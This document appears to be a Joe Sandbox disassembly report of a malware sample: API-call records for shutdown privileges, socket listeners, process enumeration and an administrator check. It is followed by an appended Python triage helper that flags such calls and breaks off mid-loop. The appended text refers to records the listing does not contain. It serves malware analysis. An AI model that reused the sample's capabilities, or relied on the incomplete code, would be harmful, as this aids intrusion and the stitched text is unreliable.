                    • Opcode ID: b6868a90a8e55dd4ae30f9d3ce35f2d5edb04a67b7ea29a25df1732ddaf465e2
                    • Instruction ID: 50f021594ebd9977403c1c43426a720cdca0727113be739d7ec79616d74666f8
                    • Opcode Fuzzy Hash: b6868a90a8e55dd4ae30f9d3ce35f2d5edb04a67b7ea29a25df1732ddaf465e2
                    • Instruction Fuzzy Hash: F402BFB0E00209DFDF04DF64D985AAE7BB5FF84340F148469E80ADB255EB39DA64CB91
                    APIs
                      • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                      • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                      • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 007B549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                    • Instruction ID: 8a3f8e87136803f1d8bf37fe205476280293b7f34bb68a97f18c738504cd8b5b
                    • Opcode Fuzzy Hash: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                    • Instruction Fuzzy Hash: 4B01F231655B556AE7A86678EC4ABFA7368EB05352F244521FD07D20D2DABC1C8081A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oav
                    • API String ID: 674341424-1091017984
                    • Opcode ID: 8d5d3b4e493c7751326bd630e7417a5908ed44251426dd9daca59d6240412abb
                    • Instruction ID: 57a7fa2da17895025f2d513c3776cae149944a018325cdfad9129dd3725b183c
                    • Opcode Fuzzy Hash: 8d5d3b4e493c7751326bd630e7417a5908ed44251426dd9daca59d6240412abb
                    • Instruction Fuzzy Hash: 49229B71518341DFCB24DF24C895BABB7E4BF84300F14891DF99A97292DB79EA04CB92
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 007C661A
                    • listen.WSOCK32(00000000,00000005), ref: 007C6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6643
                    • closesocket.WSOCK32(00000000,00000000), ref: 007C6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                    • Instruction ID: 6d6a61f396ebcd0c547127826dce0cc9c34c753f5c5190042225c8b32ad0bb97
                    • Opcode Fuzzy Hash: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                    • Instruction Fuzzy Hash: 18218B30200204DFCB10EF24C889FAEB7F9EF49320F14816EE956A7291CB78AD05DB65
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
                    • GetSysColor.USER32(0000000F), ref: 00751A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00751A61
                      • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                    • Instruction ID: acb3d0601a60a2b74a54d3bb3ce294ddfd2ef1325fb99ce9d30a714e699cb773
                    • Opcode Fuzzy Hash: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                    • Instruction Fuzzy Hash: 1BA13AB5105585FAD63AAB384C48FFF266DEF42343B94811AFC02D5191DB9C9D09D3B1
                    APIs
                      • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 007C6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6B20
                    • closesocket.WSOCK32(00000000,00000000), ref: 007C6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                    • Instruction ID: 98fcaa2746c974047a60a28ae06902964790f909d2bbae0dfce9636876ad8b5b
                    • Opcode Fuzzy Hash: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                    • Instruction Fuzzy Hash: 0141A575600214EFEB10AF24DC8AFAE77A99B44710F44C05DFE16AB2D2DBB89D048791
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                    • Instruction ID: e2bc76f86731d1cf3b2bc67a20640f746a09cf094048fc326f3ad197f3d52f68
                    • Opcode Fuzzy Hash: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                    • Instruction Fuzzy Hash: 6411C431301910AFE7211F26DC48A6F7BB8EF84B21B84802AF847D7341CB7CD901CAA9
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007BC69D
                    • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC6B5
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • CoUninitialize.OLE32 ref: 007BC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                    • Instruction ID: 473ea80f754532bdc0f0506d7a9733732768e2b5843d4479dce6ed7567770c02
                    • Opcode Fuzzy Hash: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                    • Instruction Fuzzy Hash: 40A15D71504205EFD700EF64C895EABB7ECEF84305F04891CF556971A2DBB5EA09CB62
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00791D88,?), ref: 007CC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                    • Instruction ID: 2e9d1c64d641eee1052c180f42ffaa371c90818b8e76388734a484ebfadae886
                    • Opcode Fuzzy Hash: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                    • Instruction Fuzzy Hash: 09E0ECB4601713CFDB225B35E804F4677E4EB08755B84C47EE89AD2250E77CD881CB61
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007CF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 007CF15F
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 007CF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                    • Instruction ID: a1fa167148d989da15905c6f2b473a3514b69079077bf3d1728d38498595b431
                    • Opcode Fuzzy Hash: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                    • Instruction Fuzzy Hash: 34513C71504311DFD310EF24DC89EABBBE8FF94710F14492DF99696291EB749908CB92
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: 73b28663aa7b15a2a44fb03e3fd14dabfdfde7f85998e7ecf65c46275593b528
                    • Instruction ID: 7341c480fe1ddf019cc1fb4258e0cd81f2709f9a2dbc16ac4d4081ff033745c4
                    • Opcode Fuzzy Hash: 73b28663aa7b15a2a44fb03e3fd14dabfdfde7f85998e7ecf65c46275593b528
                    • Instruction Fuzzy Hash: 58323675A00605DFDB28CF59C485A6AB7F1FF88320B11C56EE89ACB3A1E774E941CB50
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007C26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 85a9d276fe162877629e0639421a30e951a57de8dfef1017053ac60f95814218
                    • Instruction ID: 88a10474747bef47294e1f4a1bac8b979df6790a75568064533e679a7309e319
                    • Opcode Fuzzy Hash: 85a9d276fe162877629e0639421a30e951a57de8dfef1017053ac60f95814218
                    • Instruction Fuzzy Hash: EC41C471600209FFEB20DA94DCC5FBBB7BCEB40764F10806EF605A6542EA799E429764
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                    • Instruction ID: 60243b7accaf0c5e9306780db069e15e9d256d98f5dbaf121a092f5ec1660ed9
                    • Opcode Fuzzy Hash: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                    • Instruction Fuzzy Hash: 34217135A00118EFCB00EF65D884EEDBBB8FF48315F1480AAE906EB351DB35A915CB55
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                    • GetLastError.KERNEL32 ref: 007A8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: dcb4092742d6a053692718f9fd31393dd852f3b3329dc545073b555caf4d286e
                    • Instruction ID: 21c4eef9fffebec6ec1f93d6c9c820740115db1d508ddfbe20a5d2ec17d809a7
                    • Opcode Fuzzy Hash: dcb4092742d6a053692718f9fd31393dd852f3b3329dc545073b555caf4d286e
                    • Instruction Fuzzy Hash: 20118FB1514209AFD728AF54DC89D6BB7F8EB44750B24C62EF45693241EB34BC408A64
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B404B
                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007B4088
                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B4091
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                    • Instruction ID: e1e29e00bd50071bd305efb62c25eb8d26e5a39d7312f4e197740e7a71c7f5a1
                    • Opcode Fuzzy Hash: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                    • Instruction Fuzzy Hash: C91170B2901228BEE7109BE8DC44FAFBBBCEB08710F004656FA05E7191C2785A0487A1
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007B4C43
                    • FreeSid.ADVAPI32(?), ref: 007B4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                    • Instruction ID: 5b3ae2fb1a36a958ff301b05f6ba9524a58c0d732b92dca7c456c439a8f4c301
                    • Opcode Fuzzy Hash: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                    • Instruction Fuzzy Hash: B7F03C75A11208BBDB04DFE09C89AADBBB8EB08201F408469E502E2281D6745A048B54
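The record above is the textbook "is the caller an administrator?" pattern: AllocateAndInitializeSid with nSubAuthorityCount = 2, SECURITY_BUILTIN_DOMAIN_RID (0x20) and DOMAIN_ALIAS_RID_ADMINS (0x220) builds the BUILTIN\Administrators SID S-1-5-32-544, CheckTokenMembership tests the caller's token against it, and FreeSid releases it. The same listing format also carries the BlockInput(1), mouse_event and AdjustTokenPrivileges calls further down. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the "APIs" bullet lines of this listing into structured calls and flags the ones a reviewer would want to look at, decoding the admin-SID constants and the BlockInput/mouse_event arguments from the Windows SDK values. The SAMPLE text is a constructed excerpt copied from the records on this page (long argument lists trimmed); the flag table is the author's own choice of what to surface, not anything the report defines.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: "APIs" lines copied from the function listing above
# (AutoIt3 runtime inside the FormBook dropper), argument lists shortened.
SAMPLE = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B4C2C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007B4C43
• FreeSid.ADVAPI32(?), ref: 007B4C53
APIs
• __time64.LIBCMT ref: 007B8B25
  • Part of subcall function 0077543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B91F8,00000000,?), ref: 00775443
APIs
• BlockInput.USER32(00000001), ref: 007C4218
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007B4F18
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
• CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF), ref: 007BA302
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF), ref: 007BA314
"""

# One bullet of the listing: optional "Part of subcall function X:" prefix,
# Name.MODULE, optional "(args)", then "ref: ADDR". Lines without an argument
# list (e.g. "__time64.LIBCMT ref: ...") are accepted too.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Windows SDK constants (winnt.h / winuser.h).
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220
_MOUSE_FLAGS = {0x1: "MOUSEEVENTF_MOVE", 0x2: "MOUSEEVENTF_LEFTDOWN",
                0x4: "MOUSEEVENTF_LEFTUP", 0x8: "MOUSEEVENTF_RIGHTDOWN",
                0x10: "MOUSEEVENTF_RIGHTUP"}

# APIs flagged regardless of arguments (author's triage table, an assumption).
_ALWAYS = {
    "CheckTokenMembership": "tests token group membership",
    "AdjustTokenPrivileges": "changes token privileges",
    "LogonUserW": "authenticates with supplied credentials",
    "SetUnhandledExceptionFilter": "replaces the top-level exception filter",
    "FindFirstFileW": "enumerates files",
    "GetUserNameW": "reads the current user name",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list = field(default_factory=list)  # int for hex, None for '?', str otherwise
    ref: int = 0
    subcall_of: Optional[int] = None


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None  # Joe could not recover the value
    try:
        return int(tok, 16)
    except ValueError:
        return tok  # string literal such as "AutoIt v3" or "static"


def parse_report(text: str) -> list:
    """Split the listing into records, one list of ApiCall per 'APIs' block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = _CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [_parse_arg(t) for t in raw.split(",")] if raw else []
            sub = m.group("sub")
            current.append(ApiCall(m.group("name"), m.group("module"), args,
                                   int(m.group("ref"), 16),
                                   int(sub, 16) if sub else None))
    return records


def flag(call: ApiCall) -> Optional[str]:
    """Return a reason string if the call is worth a reviewer's attention."""
    a = call.args
    if call.name == "AllocateAndInitializeSid":
        if len(a) >= 4 and a[1:4] == [2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS]:
            return "builds BUILTIN\\Administrators SID S-1-5-32-544"
        return "builds a SID"
    if call.name == "BlockInput":
        return "blocks keyboard and mouse input (BlockInput(TRUE))" if a[:1] == [1] else None
    if call.name == "mouse_event":
        bits = a[0] if a and isinstance(a[0], int) else 0
        names = [n for bit, n in _MOUSE_FLAGS.items() if bits & bit]
        return "synthesizes mouse input: " + "|".join(names or ["?"])
    return _ALWAYS.get(call.name)


def triage_record(calls: list) -> list:
    """Findings for one function; adds the combined is-admin verdict when the SID and membership test co-occur."""
    findings = [r for r in (flag(c) for c in calls) if r]
    names = {c.name for c in calls}
    if "CheckTokenMembership" in names and any("S-1-5-32-544" in f for f in findings):
        findings.append("is-admin check (IsUserAnAdmin pattern)")
    return findings


if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE)):
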